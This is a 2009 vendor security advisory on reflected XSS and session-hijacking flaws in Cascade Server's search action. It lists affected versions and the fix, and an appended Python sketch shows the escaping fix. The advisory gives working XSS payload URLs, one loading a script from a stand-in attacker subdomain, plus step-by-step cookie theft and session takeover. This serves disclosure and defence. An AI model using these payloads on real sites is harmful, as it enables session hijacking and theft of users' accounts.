Security Update 6-29-2009
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions
Severity: Moderate
Hannon Hill rates the severity of these vulnerabilities as
Moderate. The vulnerabilities allow an attacker to make victims
execute arbitrary JavaScript, gain access to Cascade, or elevate
his/her privileges; but they require the attacker to manipulate
victims using social engineering tactics. If the attacker already
had Cascade credentials, he/she could embed a malicious link in
frequently visited content to more easily manipulate victims into
navigating to it.
Risk Assessment
The underlying vulnerability is that user input is returned
verbatim to the browser when the search query supplied by the user
cannot be parsed.
XSS Vulnerability
An attacker without access to Cascade could manipulate victims
using social engineering tactics into executing arbitrary JavaScript
when navigating to the Cascade search action.
An example link would be:
http://domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic
An attacker with access to Cascade could embed a link to the
Cascade search action containing arbitrary JavaScript in a
prominent place within Cascade page content to more easily
manipulate victims into navigating to the link.
CSRF Vulnerability
The CSRF vulnerability is an extension of the XSS
vulnerability, except that it also requires the attacker to have
access to a server at the same top-level domain as where Cascade is
running. For example, if Cascade is hosted at
cascade.hannonhill.com, the attacker would also need access to a
sub-domain like intranet.hannonhill.com.
The steps to exploit this vulnerability are as follows:
1. Create an XSS link like:
http://cascade.domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Edocument.domain=domain.com%3C/script%3E%3Cscript%20src=http://subdomain.domain.com/attacker/x.js%20/%3E&mode=basic
Here the attacker resets the document domain for the page to the
very top-level domain. This allows the attacker to bypass the browser's
Same-Origin Policy and the security restrictions that would
normally prevent a script from loading from a different server.
2. Social engineer a victim into visiting the above XSS link, or, if the
attacker already has access to Cascade, embed this link in the
content of a frequently visited page.
3. When the victim clicks the link, the malicious script loads and
sends the victim's document.cookie (which includes the JSESSIONID) to an
off-site server.
4. The attacker visits
https://cascade.domain.com:port/login.act
so that the system sets a valid cookie on the attacker's browser.
5. The attacker replaces his valid JSESSIONID with the one retrieved
via XSS and successfully assumes the identity of the victim.
Vulnerability
The XSS and CSRF vulnerabilities exist for all Cascade Server
versions prior to Cascade 5.7.5 in the 5 series and prior to 6.0.3 in
the 6 series.
Fix
The fix is for Cascade to properly escape or hide user input when displaying the error message on the search results page.
This issue has been fixed in Cascade 5.7.5, 6.0.3, and later. There are no patch versions available for Cascade versions 5.5.x or earlier. We recommend an upgrade to Cascade 5.7.x or later.
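The following is an added illustration of the root cause described under "Risk Assessment" and of the escaping fix described above; it is not Cascade code and not provided by Hannon Hill. It models the search-results page as a small Python function: the query parser, the error-message renderer and the URL are all constructed stand-ins (the real Cascade parser is not shown here), and the sample link is the advisory's own example. The "before" renderer concatenates the unparsable query into the HTML as-is; the "after" renderer HTML-escapes it so the browser shows it as text instead of executing it.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed copy of the advisory's example link (placeholder host and port).
EXAMPLE_URL = ("http://domain:port/searchsubmit.act"
               "?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic")


def quick_query_from_url(url):
    """Extract and percent-decode the quickQuery parameter from a search URL."""
    return parse_qs(urlsplit(url).query).get("quickQuery", [""])[0]


def parse_query(query):
    """Hypothetical stand-in for the search parser: a query with an
    unbalanced double quote is treated as unparsable, like the advisory's
    payload which starts with a stray %22."""
    if query.count('"') % 2:
        raise ValueError("unbalanced quote in search query")
    return query.split()


def render_error_vulnerable(query):
    """Before the fix: the raw query is reflected verbatim into the page,
    so any markup in it is interpreted by the browser."""
    return f"<p>Could not parse search query: {query}</p>"


def render_error_fixed(query):
    """After the fix: escape & < > \" ' so the query is rendered as text.
    Escaping quotes too keeps the value safe inside attributes as well."""
    return f"<p>Could not parse search query: {html.escape(query, quote=True)}</p>"


def search_results_page(query, render_error=render_error_fixed):
    """Render the results page; on a parse failure fall back to the error
    renderer (the fixed one by default)."""
    try:
        terms = parse_query(query)
    except ValueError:
        return render_error(query)
    # Successful results are escaped as well: every reflected value is data.
    return "<ul>" + "".join(f"<li>{html.escape(t)}</li>" for t in terms) + "</ul>"


if __name__ == "__main__":
    q = quick_query_from_url(EXAMPLE_URL)
    print("decoded query :", q)
    print("vulnerable    :", search_results_page(q, render_error_vulnerable))
    print("fixed         :", search_results_page(q))
```

Running the module prints the decoded payload, the vulnerable rendering containing a live <script> element, and the fixed rendering in which the same payload appears as &lt;script&gt; text. The point the example makes is that the escaping must happen on every output path, including the error path taken only when parsing fails, which is exactly the path the advisory identifies.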